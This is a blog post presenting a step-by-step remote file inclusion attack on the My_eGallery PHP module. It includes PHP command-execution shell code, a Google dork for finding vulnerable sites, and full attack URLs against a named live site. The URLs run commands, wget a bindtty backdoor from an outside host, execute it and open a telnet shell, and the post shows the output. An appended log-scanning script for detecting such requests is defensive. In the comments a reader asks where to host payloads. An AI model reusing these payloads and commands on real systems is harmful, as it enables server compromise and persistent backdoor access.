My_eGallery Injection
This bug may be fairly old, but there are still plenty of sites we can
play with, hehe.. (that's what Google is for, I guess). The bug is in
"My_eGallery". Basically, it occurs when an "intruder" supplies a
parameter (in the form of PHP code) to the target's My_eGallery site
by way of the "intruder's" own web site.

=====Start PHP Code=========

// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>

==========End===============

Right, let's try it (here comes the fun part, hehehe).
First, upload the PHP code to your own site (it can be a .txt file).
Or, if you're feeling lazy, you can grab it from
http://www.geocities.com/java_sas/pascal.txt
OK, now let's open my favorite site, "www.google.com" (found
most everything here!!),
and enter the keyword: allinurl:my_eGallery site:.com (the .com
can be replaced with whatever you like: .net, .id, .tv, etc.)...
The result...!!! Lots of them, right.. hehehe

Let's get our tools ready.. what tools? Just a browser, Explorer
or Netscape :) Simple, right?
Once that's done, take a URL we got from Google earlier and combine it
with the location of the PHP code on our own site:

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.php?
basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=uname%20-a

Let's look at it piece by piece:
*http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.php
= the target site and the directory where My_eGallery lives

*http://www.geocities.com/java_sas/pascal.txt = the intruder's site,
where the PHP code from earlier is stored
*cmd=uname%20-a = do I really need to tell you? hehehehe

OK, let's see what the browser returns for that URL:

Linux server1.fastsecurehost.com 2.4.22-1.2174.nptlsmp #1 SMP Wed Feb 18
16:21:50 EST 2004 i686 i686 i386 GNU/Linux
Whoaaaa.. hehehe, the command got executed!! To make things
more interesting, how about we upload "bindtty" to the target site, so
we can telnet into it :)

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.
php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20
/var/tmp%20;%20wget%20www.renjana.ws/~toa/bindtty

Note: cmd=cd%20/var/tmp%20;%20wget%20www.renjana.ws/~toa/bindtty
Since we are not root, uploading files is usually allowed in the
/var/tmp directory, so then we just wget bindtty (here I fetch it
from www.renjana.ws/~toa/bindtty).
Look at what the browser returns:

--04:22:42-- http://www.renjana.ws/%7Etoa/bindtty
=> `bindtty'
Resolving www.renjana.ws... done.
Connecting to www.renjana.ws[66.111.56.80]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,380 [text/plain]

0K .......... ........ 100% 151.41 KB/s

04:22:43 (151.41 KB/s) - `bindtty' saved [19380/19380]

Oops... it worked :) We're halfway there, hehehe.. Now that bindtty is
saved on the target site, we only need to run it, but first
of course we change its permissions:

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory.
php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20
/var/tmp%20;%20chmod%20755%20bindtty

After that we can finally run the bindtty program:

http://www.clontarfhc.com/modules/My_eGallery/public/displayCategory
.php?basepath=http://www.geocities.com/java_sas/pascal.txt?&cmd=cd%20
/var/tmp%20;%20./bindtty

And in your browser you will see the PID of bindtty.. hehehe.. it's
running!! Now open telnet (I usually use PuTTY) and
telnet to the target site on port 4000 (since the bindtty at
www.renjana.ws/~toa/bindtty is set to port 4000).
It's much nicer over telnet.. hehehe
$bash id
uid=99(nobody) gid=99(nobody) groups=99(nobody)
What comes next... is up to you...
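
The requests in the walkthrough above all leave the same signature in the target's access log: a query parameter (here `basepath`) whose value is a remote URL, usually alongside a `cmd` parameter. The following is an added example, not part of the original post, that flags such requests in web-server logs; the log lines, hosts, and the `scan` and `remote_include_params` names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (combined format); IPs and hosts are documentation values.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2005:04:22:40 +0000] "GET /modules/My_eGallery/public/'
    'displayCategory.php?basepath=http://files.example.org/p.txt?&cmd=uname%20-a '
    'HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2005:04:23:02 +0000] "GET /modules/My_eGallery/public/'
    'displayCategory.php?cat=3 HTTP/1.1" 200 2048',
    '192.0.2.12 - - [01/Jan/2005:04:25:17 +0000] "GET /index.php?'
    'page=http%253A%252F%252Ffiles.example.org%252Fp.txt HTTP/1.1" 404 310',
    '192.0.2.13 - - [01/Jan/2005:04:26:00 +0000] "GET /search.php?'
    'q=see%20http://example.com HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def remote_include_params(target):
    """Return (name, value) pairs whose decoded value starts with a remote URL scheme."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # second decode catches double-encoded values
        if REMOTE_RE.match(decoded):
            hits.append((name, decoded))
    return hits

def scan(lines, module_hint="my_egallery"):
    """Flag requests that pass a remote URL as a parameter value."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = m["target"]
        hits = remote_include_params(target)
        if hits:
            params = dict(parse_qsl(urlsplit(target).query))
            findings.append({
                "ip": m["ip"], "path": urlsplit(target).path,
                "status": int(m["status"]), "remote": hits,
                "cmd": params.get("cmd"),  # command passed to the included script, if any
                "known_module": module_hint in target.lower(),
            })
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

A hit with status 200 and a `cmd` value warrants immediate review of the host. On the server side, PHP's `allow_url_include` setting (off by default since PHP 5.2) blocks includes of remote URLs, and include paths should never be built from request parameters.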




10 comments:

Bima said...

I have just one question..

I don't have the PHP code,,

could I ask for the latest PHP code, bro..

Besides geocities.com, what else can we use to upload our files that is free and good... hehehe..

Please help, bro..

Anonymous said...

wordpress.com

Ujie Caprone | © 2011 Blogger Template by Ujiecaprone.com